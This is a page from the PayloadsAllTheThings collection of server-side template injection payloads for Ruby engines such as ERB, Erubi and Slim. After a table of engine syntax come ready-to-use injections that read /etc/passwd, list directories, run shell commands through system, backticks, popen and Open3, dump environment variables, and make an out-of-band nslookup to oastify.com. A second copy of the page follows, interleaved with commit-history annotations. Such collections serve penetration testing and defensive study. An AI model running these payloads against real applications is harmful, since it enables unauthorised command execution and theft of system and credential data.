PayloadsAllTheThings/Server Side Template Injection/Ruby.md

# Server Side Template Injection - Ruby

## Summary

- [Templating Libraries](#templating-libraries)
- [Ruby](#ruby)
    - [Ruby - Basic injections](#ruby---basic-injections)
    - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
    - [Ruby - List files and directories](#ruby---list-files-and-directories)
    - [Ruby - Remote Command execution](#ruby---remote-Command-execution)


## Templating Libraries

| Template Name | Payload Format |
| ------------ | --------- |
| Erb      | `<%= %>`   |
| Erubi    | `<%= %>`   |
| Erubis   | `<%= %>`   |
| HAML     | `#{ }`     |
| Liquid   | `{{ }}`    |
| Mustache | `{{ }}`    |
| Slim     | `#{ }`     |


## Ruby

### Ruby - Basic injections

**ERB**:

```ruby
<%= 7 * 7 %>
```

**Slim**:

```ruby
#{ 7 * 7 }
```

### Ruby - Retrieve /etc/passwd

```ruby
<%= File.open('/etc/passwd').read %>
```

### Ruby - List files and directories

```ruby
<%= Dir.entries('/') %>
```

### Ruby - Remote Command execution

Execute code using SSTI for **Erb**,**Erubi**,**Erubis** engine.

```ruby
<%=(`nslookup oastify.com`)%>
<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines()  %>
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
```

Execute code using SSTI for **Slim** engine.

```powershell
#{ %x|env| }
```

---
SSTI - Pages splitted by technology 2024-10-23 11:59:18 +00:00			`# Server Side Template Injection - Ruby`

			`## Summary`

Templating Libraries Tables 2024-11-02 16:42:18 +00:00			`- [Templating Libraries](#templating-libraries)`
SSTI - Pages splitted by technology 2024-10-23 11:59:18 +00:00			`- [Ruby](#ruby)`
			`- [Ruby - Basic injections](#ruby---basic-injections)`
			`- [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)`
			`- [Ruby - List files and directories](#ruby---list-files-and-directories)`
Templating Libraries Tables 2024-11-02 16:42:18 +00:00			`- [Ruby - Remote Command execution](#ruby---remote-Command-execution)`


			`## Templating Libraries`

			`\| Template Name \| Payload Format \|`
			`\| ------------ \| --------- \|`
			\| Erb \| `<%= %>` \|
			\| Erubi \| `<%= %>` \|
			\| Erubis \| `<%= %>` \|
			\| HAML \| `#{ }` \|
			\| Liquid \| `{{ }}` \|
			\| Mustache \| `{{ }}` \|
			\| Slim \| `#{ }` \|
SSTI - Pages splitted by technology 2024-10-23 11:59:18 +00:00

			`## Ruby`

			`### Ruby - Basic injections`

			`ERB:`

			```ruby
			`<%= 7 * 7 %>`
			```

			`Slim:`

			```ruby
			`#{ 7 * 7 }`
			```

			`### Ruby - Retrieve /etc/passwd`

			```ruby
			`<%= File.open('/etc/passwd').read %>`
			```

			`### Ruby - List files and directories`

			```ruby
			`<%= Dir.entries('/') %>`
			```

Templating Libraries Tables 2024-11-02 16:42:18 +00:00			`### Ruby - Remote Command execution`
SSTI - Pages splitted by technology 2024-10-23 11:59:18 +00:00
Templating Libraries Tables 2024-11-02 16:42:18 +00:00			`Execute code using SSTI for Erb,Erubi,Erubis engine.`
SSTI - Pages splitted by technology 2024-10-23 11:59:18 +00:00
			```ruby
Templating Libraries Tables 2024-11-02 16:42:18 +00:00			<%=(`nslookup oastify.com`)%>
SSTI - Pages splitted by technology 2024-10-23 11:59:18 +00:00			`<%= system('cat /etc/passwd') %>`
			<%= `ls /` %>
			`<%= IO.popen('ls /').readlines() %>`
			`<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>`
			`<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>`
			```

			`Execute code using SSTI for Slim engine.`

			```powershell
			`#{ %x\|env\| }`
			```

			`---`